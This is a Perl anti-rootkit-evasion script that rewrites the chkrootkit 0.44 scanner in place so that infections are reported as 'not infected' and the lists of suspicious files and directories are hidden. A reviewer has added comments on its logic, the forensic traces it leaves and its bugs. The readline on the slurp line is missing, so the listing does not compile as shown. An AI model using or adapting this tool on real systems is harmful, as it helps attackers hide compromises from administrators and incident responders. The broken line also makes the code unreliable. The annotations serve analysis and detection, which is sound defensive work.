#!/usr/bin/perl -w
# Anti-antirootkit coded by saic. This code will stop chkrootkit from
# doing its thing. Tested on chkrootkit version 0.44 running on Red Hat
# Enterprise 3. The code can be easily modified for other anti-rootkit
# tools.
#
# Usage: Just run the Perl script and it'll take care of the rest.
# No, this isn't a script-kiddie tool. Skiddies don't gain root very
# often. You will need write permissions on the files to change (which
# is usually only granted to the superuser). This is NOT some
# root-gaining exploit.
#
# Make sure to drop me an e-mail (introop at gmail dot com) if there are
# updates that may stop this code from working. Oh yeah, this is under the
# GNU GPL by the way. Not that anybody would steal this code, but still.
# Shell donations are welcome as well.
#
# Reviewer notes (what this script actually does, and what it leaves behind):
#   * It rewrites the chkrootkit shell script in place so that its INFECTED
#     verdicts are reported as clean and the lists of suspicious files and
#     directories are suppressed. It is an evasion / anti-forensics tool,
#     not an exploit: it needs write access to /usr/bin/chkrootkitscan.
#   * The edit is a set of text substitutions tied to the exact wording of
#     chkrootkit 0.44 (see the patterns below). A version whose script text
#     differs is silently left unchanged: none of the s/// calls check
#     whether anything matched.
#   * Artifacts a responder can look for: the original is moved to
#     ./chkrootkit.backup in the current directory; a temporary output.txt
#     is created in the current directory; the replacement script has fresh
#     timestamps, only its executable bit is restored (other mode bits come
#     from the running user's umask), and its content no longer matches the
#     packaged file, so package verification or any stored checksum /
#     integrity baseline should flag it.
#   * As extracted here, the readline on the `$file_content = ;` line is
#     incomplete (presumably `<INFILE>` was lost), so this listing does not
#     compile as-is; see the note at that line.
#   * No `use strict`; bareword filehandles and two-argument open() are used
#     throughout; the exit status of the shelled-out mv/chmod is ignored.

# Open the chkrootkit script for reading (two-argument open on a fixed path,
# bareword handle). The message claims "not found" for any failure, e.g.
# permission denied, because $! is not included.
open(INFILE, "/usr/bin/chkrootkitscan") or die "File not found, are you sure it's installed?\n File not found:";
print "Editing chkrootkit...\n";
sleep(1);     # cosmetic pause only

# Undefine the input record separator so the next readline returns the whole
# file at once. This is at file scope, so slurp mode stays in effect for the
# rest of the program.
local $/;

# Slurp the script into $file_content. NOTE(review): the right-hand side is
# empty in this listing -- most likely `<INFILE>` was stripped during
# extraction (it looks like an HTML tag). As written this is a syntax error.
$file_content = ;

# Text substitutions against the chkrootkit 0.44 script source:
#   - every `STATUS=${INFECTED}` assignment becomes `STATUS=${NOT_INFECTED}`,
#     so the per-check status variable never reports an infection;
#   - the `0) echo "INFECTED"` case branch prints "not infected" instead;
#   - `echo ${files}` (the list of suspicious files) prints "nothing found";
#   - `echo ${dirs}` (the list of suspicious directories) is deleted.
# `\ ` in the second pattern is an escaped literal space. None of these
# substitutions verify that a match occurred, so an unexpected chkrootkit
# version is left unchanged without any warning.
$file_content =~ s/STATUS=\$\{INFECTED}/STATUS=\$\{NOT_INFECTED}/g;
$file_content =~ s/0\)\ echo "INFECTED"/0\)\ echo "not infected"/g;
$file_content =~ s/echo \$\{files}/echo "nothing found"/g;
$file_content =~ s/echo \$\{dirs}//g;

close INFILE;

# Move the original aside into the CURRENT directory, not a fixed location.
# readpipe runs the command through the shell and its exit status ($?) is
# never checked, so a failed mv goes unnoticed.
readpipe "mv /usr/bin/chkrootkitscan ./chkrootkit.backup";

# Write the edited text to a temporary file in the current directory.
# `>>` is APPEND mode: if output.txt already exists, its old contents end up
# at the top of the replacement chkrootkit script. The open is unchecked.
open(OUTFILE, ">>output.txt");
print OUTFILE ("$file_content");
close OUTFILE;

# Replace chkrootkit with the temporary file and restore only the executable
# bit. The result is a freshly created file: new timestamps, mode taken from
# the current umask plus +x, owned by whoever ran this script.
readpipe "mv output.txt /usr/bin/chkrootkitscan";
readpipe "chmod +x /usr/bin/chkrootkitscan";
print "chkrootkit has been edited.\n";